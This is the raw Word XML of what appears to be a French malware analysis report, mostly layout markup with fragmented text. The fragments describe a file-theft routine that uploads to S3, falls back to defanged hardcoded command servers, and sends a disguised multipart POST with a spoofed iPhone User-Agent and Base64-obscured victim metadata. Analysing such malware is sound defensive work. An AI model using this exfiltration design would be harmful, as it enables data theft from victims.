                          <a:moveTo>
                            <a:pt x="2661284" y="634999"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2661284" y="435610"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3352165" y="435610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3352165" y="634999"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2660649" y="436245"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3352799" y="436245"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="634999"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="435610"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2286635" y="435610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2286635" y="634999"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="436245"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2287270" y="43624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6368" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3416299</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8422649</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="528320" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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32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32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527685" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="527685" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="52832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5584" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1926589</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8858259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4537710" cy="431168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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37710" cy="4311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37710" h="431165">
                          <a:moveTo>
                            <a:pt x="0" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3392169" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="415290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4537075" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4537075" y="415290"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4537710" y="21653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3883024" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3883024" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="388366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6608" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5318124</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9288789</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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8656" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9288789</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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96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3191507</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3221989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="259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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-39" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="32219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3221989">
                          <a:moveTo>
                            <a:pt x="0" y="3221989"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="3221989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322198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070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172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2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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Si l’exfiltration aboutit, le hachage du fichier volé est ajouté au fichier de suivi local afin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3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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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d’éviter tout nouveau téléchargement ultérieur. Toutefois, si le téléchargement vers S3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4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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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échoue en raison de restrictions réseau ou d’identifiants révoqués, la fonction déclenche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5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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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mécanisme de secours. Elle interroge la configuration du registre local pour obtenir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6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1929153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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domaine et une adresse IP, dont les valeurs par défaut sont les points de terminaison codés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7872" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4196511</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2099575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2501986" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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98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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="4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hxxps://165.22.170[.]129/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8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2099575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2938100" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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810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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="2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dur</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="49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hxxps://justsstop[.]ru/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9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2282213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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Contrairement à la routine S3, qui expose les métadonnées d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ans l’URL, ce mécanisme</w:t>
                        </w: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0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2474183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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secours dissimule les métadonnées au sein d’une structure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multipart/form-data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.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1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2689448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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requête se fait passer pour un appareil iPhone à l’aide d’une chaîne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User-Agent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codée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2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2886098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3893093" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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930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dur. Le schéma de cette requête POST est défini comme suit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4016" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2228850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6390025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3173541" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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3541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18 – Schéma de la requête POST exfiltrant les fichiers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5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6642758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3116501" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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650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Voici le tableau présentant les variables utilisées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6064" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1160144</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6958988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="509141" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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1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Champ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7088" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3838575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6958988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912220" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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2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Motif / Valeur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8112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7325583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4799075" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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990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Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X)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99136" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>954404</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7540848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852956" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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95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User-Agent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0160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7540848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4799710" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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997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2"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0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1184" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4173220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7757818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="866517" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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5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(codé en dur)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2208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7756113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2264155" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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415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Mobile/15E148 Safari/604.1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32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8130563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="966988" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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69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Métadonnées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4256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8192358</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4755398" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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5539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5"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[PREFIX_1] + y + [SUFFIX]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08"/>
                            <w:spacing w:val="37"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> où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PREFIX_1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est composé de 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52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8303918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="991138" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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11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16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">relatives 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6304" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8409328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1526016" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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60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caractères aléatoires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7328" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3435985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8407623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2500930" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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093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SUFFIX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de 5 à 10 caractères aléatoires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83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8477273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="369485" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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4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body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9376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8843868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3875086" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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508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[RANDOM]::1000::[RANDOM]::[FOLDER:]::[RANDOM]::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8919233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="996833" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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8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Champ</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle15"/>
                            <w:spacing w:val="12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18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1424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9059133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4528463" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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846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[MODIFICATION_DATE]::[RANDOM]::[SIZE_BYTES]::[RANDOM]::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24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9092588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="369485" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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4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body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3472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1811540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9092588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="121282" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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28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44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9265943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="842369" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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23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Charge utile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5520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9274398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3494223" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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42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[USER_ID]::[RANDOM]::[MD5_FILE]::[RANDOM]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6544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9471048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4775083" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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0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Une chaîne encodée en Base64 contenant l'identifiant de la victime,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75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6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85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6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96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6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06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6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16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6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7257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60085" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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351155">
                          <a:moveTo>
                            <a:pt x="990600" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="9906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989965" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="989965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  <a:moveTo>
                            <a:pt x="990600" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="9906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989965" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="989965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804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67070" cy="2015489"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20154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2015489">
                          <a:moveTo>
                            <a:pt x="5763895" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5763895" y="2015489"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="993775" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="993775" y="2009139"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="2015489"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2012314"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="2012314"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1487804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1487804"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="882015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="882015"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="354964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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1360" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1926589</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1911359</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3352799" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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279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52799" h="199389">
                          <a:moveTo>
                            <a:pt x="2662555" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2662555" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3352165" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3352165" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2661920" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3352799" y="635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2286635" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2286635" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="228727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5456" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3416299</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2125989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="528320" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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32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32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527685" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="527685" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="52832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9552" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5459730</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2583189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773429" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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42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42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772794" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772794" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77342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1600" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6660514</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4598679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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3648" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5398135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4598679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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18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4814579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2983230" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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83230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83230" h="414020"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2982594" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2982594" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2983230" y="21526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2736215" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2736215" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="273685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5936" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5725159</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5029209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="935990" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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99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599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935354" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="935354" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93599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003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5245109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2736850" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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85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685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2736215" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2736215" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="273685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105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6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208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3104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1160144</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="509141" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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1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Champ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4128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3838575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912220" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2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Motif / Valeur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5152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1353208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4775083" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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0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chemin d'accès au fichier et des horodatages, ainsi que des données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6176" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1524858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3280293" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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029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aléatoires "sans signification" et des séparateurs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::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7200" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1945639</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1896333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4756033" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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560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5"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[PREFIX_2] + z + [SUFFIX]</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, où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PREFIX_2</w:t>
                        </w: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 est composé de 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82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1920898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="996833" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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8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Fichier</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle15"/>
                            <w:spacing w:val="13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19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92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2094253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="369485" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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94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body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0272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2113303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1526016" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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60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caractères aléatoires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1296" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3435985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2111598</wp:posOffset>
            </wp:positionV>
